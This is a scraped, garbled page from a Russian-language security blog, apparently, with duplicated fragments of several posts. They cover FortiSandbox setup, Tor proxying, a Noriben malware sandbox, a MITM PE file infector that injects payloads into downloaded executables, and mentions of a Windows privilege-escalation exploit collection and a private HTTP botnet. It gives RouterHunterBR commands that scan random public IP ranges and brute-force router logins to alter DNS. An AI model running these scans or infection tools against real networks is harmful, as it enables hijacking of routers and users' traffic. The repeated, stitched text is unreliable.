На своем ESXI (6я версия) я добавил строчку:
[root@localhost:~] cat /etc/vmware/config
libdir = "/usr/lib/vmware"
authd.proxy.nfc = "vmware-hostd:ha-nfc"
authd.proxy.nfcssl = "vmware-hostd:ha-nfcssl"
authd.proxy.vpxa-nfcssl = "vmware-vpxa:vpxa-nfcssl"
authd.proxy.vpxa-nfc = "vmware-vpxa:vpxa-nfc"
authd.fullpath = "/sbin/authd"
vhv.enable = "TRUE"
Деплоим .ovf контейнер, настраиваем ip адрес на порту "port1" (ip адрес будет нужен на этапе генерации лицензий)
После деплоя, запускаем, ждем пока закончится разметка волумов, и инициализация бд.
Заходим, admin:пусто.
Прописываем адрес и гейт:
> set port1-ip 192.168.1.123/24
> set default-gw 192.168.1.1
Скачиваем файл лицензий, и заливаем их через Web-iface. (https://192.168.1.123)
Ко мне на тест попал виртуальный аплайнс для развертывания на гипервизорах vmware.
После запроса лицензий инстанс был зарегистрирован в базе форти и был сгенерирован файл для активации виртуалки (.lic)
Установка и настройка Fortisandbox:
Обязательным условием является поддержка CPU опций:
Intel Virtualization Technology (VT-x/EPT) или AMD Virtualization (AMD-V/RVI),
а так же в BIOS должен быть включен - Virtualization Technology and 64-bit support.
На своем ESXI (6я версия) я добавил строчку:
[root@localhost:~] cat /etc/vmware/config
libdir = "/usr/lib/vmware"
authd.proxy.nfc = "vmware-hostd:ha-nfc"
authd.proxy.nfcssl = "vmware-hostd:ha-nfcssl"
authd.proxy.vpxa-nfcssl = "vmware-vpxa:vpxa-nfcssl"
authd.proxy.vpxa-nfc = "vmware-vpxa:vpxa-nfc"
authd.fullpath = "/sbin/authd"
vhv.enable = "TRUE"
Деплоим .ovf контейнер, настраиваем ip адрес на порту "port1" (ip адрес будет нужен на этапе генерации лицензий)
После деплоя, запускаем, ждем пока закончится разметка волумов, и инициализация бд.
Заходим, admin:пусто.
Прописываем адрес и гейт:
> set port1-ip 192.168.1.123/24
> set default-gw 192.168.1.1
Скачиваем файл лицензий, и заливаем их через Web-iface. (https://192.168.1.123)
Tor + SwitchyOmega + Chrome [.onion auto-proxy]
Связка простая:
Скачиваем Tor бандл с офф сайта :
https://www.torproject.org/download/download.html.en или
https://www.torproject.org/dist/torbrowser/5.5.1/tor-win32-0.2.7.6.zip
Анпачим архив, запускаем проксю:
https://www.torproject.org/download/download.html.en или
https://www.torproject.org/dist/torbrowser/5.5.1/tor-win32-0.2.7.6.zip
Анпачим архив, запускаем проксю:
Эксплойты для эскалации привилегий в Windows
Коллекция эксплойтов для поднятия привилегий в системах симейства Windows NT
[Exploit collection for NT operating system privilege escalation.]
05.02.2016
Fast Malware Sandbox Create [Noriben+VMware+Windows+LOKI]
Мой опыт быстрого развертывания портативной среды анализа малвари, на основе vmware и noribien. (аналог Cuckoo)
Скачать все тулзы (что ниже) одним архивом + батники запуска анализа:
VMware
Для начала устанавливаем VMware Workstation. На момент теста у меня стояла 12.1.0 build-3272444. (Pro)
После чего устанавливаем VMware VIX 1.15.0 API for Windows 64-bit operating systems (для каждой вервии вари свой vix)
для 12.1.0 вари: http://www.tuinformaticafacil.com/descargas-gratis/virtualizacion/vmware/vmware-vix-api-para-windows-32-bit-y-64-bit
Windows Malware VM
Для быстроты развертывания можно взять готовый образ Windows XP с официального сайта мелкософта: https://dev.windows.com/en-us/microsoft-edge/tools/vms/windows/
Скачать все тулзы (что ниже) одним архивом + батники запуска анализа:
https://mega.nz/#F!cAc0XSAA!gyHheyBPOeQ_M44U77DXaw
Или собираем с самыми свежими версиями софта:
Или собираем с самыми свежими версиями софта:
VMware
Для начала устанавливаем VMware Workstation. На момент теста у меня стояла 12.1.0 build-3272444. (Pro)
После чего устанавливаем VMware VIX 1.15.0 API for Windows 64-bit operating systems (для каждой вервии вари свой vix)
для 12.1.0 вари: http://www.tuinformaticafacil.com/descargas-gratis/virtualizacion/vmware/vmware-vix-api-para-windows-32-bit-y-64-bit
Для быстроты развертывания можно взять готовый образ Windows XP с официального сайта мелкософта: https://dev.windows.com/en-us/microsoft-edge/tools/vms/windows/
Скачиваем образ по варю и деплоим виртуалку.
После деплоя, нужно довесить сетевуху и обновить vmware-tools, ребутимся.
Далее скачиваем необходимый софт:
04.02.2016
PE injector [MITM PE file infector]
Инжект в PE своей кастомной полезной нагрузки без изменений основного функционала оригинального файла. Пачинг PE происходит во время передачи файла.
Готовый образ да малины (все предустановленно):
SSH:user: root
pass: raspberry
Ports:
3333: python webserver (GUI)
31337: peinjector data port (communication proxy <-> peinjector)
31338: peinjector control port (communication GUI <-> peinjector)
8080: proxy
Twitter sec memories #2 [04.02.15] (HTTP botnet / Android app analysis vm / Router Hunter / MITM vm )
Моя подборка тулз и заметок по ИБ в одном посте #2
(наиболее интересное что накопилось за пару дней)
Терминальный дашборд:
MITM Virtual Machine
(наиболее интересное что накопилось за пару дней)
Сетап:
HTTP BOTNET Betabot 1.8.0.0.1(Private Version)
AndroL4b -виртуалка для реверса приложений для видроида. (A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis)
username : andro
password : androlab
RouterhunterBR 2.0 - тестирование роутеров на уязвимости (automated Tool for Testing in Vulnerable Routers)
Random ips:
master mirrors v2 branch, to install:
go get -u github.com/gizak/termui
For the compatible reason, you can choose to install the legacy version of termui:
For the compatible reason, you can choose to install the legacy version of termui:
go get gopkg.in/gizak/termui.v1
(делать все только на виртуалке)
username : andro
password : androlab
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10
Scanner in range ip:
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10
IP range customized with wildcard / Ex: --startip 201.*.*.* - --endip 201.*.*.*
IP range customized with wildcard / Ex: --startip 201.*.*.* - --endip 201.*.*.*
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10
Brute force with users and passwords on routers that requires authentication, forcing alteration of dns - DSLink 260E.
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10
Подписаться на:
Сообщения (Atom)